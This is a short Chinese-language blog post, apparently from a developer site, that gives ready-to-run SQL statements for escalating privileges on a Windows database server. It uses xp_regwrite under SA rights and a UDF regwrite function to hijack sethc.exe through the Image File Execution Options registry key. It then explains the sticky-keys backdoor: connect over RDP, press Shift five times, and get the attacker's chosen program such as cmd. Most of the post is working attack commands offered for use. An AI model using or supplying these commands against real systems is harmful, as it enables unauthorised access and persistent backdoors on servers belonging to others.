SA权限下的映象劫持语句

SA权限下有时不能执行命令,下面给出注册表提权的劫持语句 :exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE// Microsoft//Windows NT//CurrentVersion//Image File Execution Options//sethc.exe','debugger','REG_SZ','c://windows//explorer.

 

  

SA权限下有时不能执行命令,下面给出注册表提权的劫持语句

:exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE// Microsoft//Windows NT//CurrentVersion//Image File Execution Options//sethc.exe','debugger','REG_SZ','c://windows//explorer.exe'
:exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE// Microsoft//Windows NT//CurrentVersion//Image File Execution Options//sethc.exe','debugger','REG_SZ','c://windows//system32//taskmgr.exe'
 

写注册表函数.
select regwrite("HKEY_LOCAL_MACHINE","SOFTWARE// Microsoft//Windows NT//CurrentVersion//Image File Execution Options//sethc.exe","Debugger","REG_SZ","E://web//170stock//admin//include//explorer.exe");


通过udf提权加上regwrite这个函数
然后改注册表,把sethc.exe 的路径改成了我们想运行的程序(比如cmd)
然后连3389,按下5次shift就执行我我们的程序,很好,就是sethc后门原理

不过管理组做了手脚,我们加到localgroup administrators的用户进不去3389

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值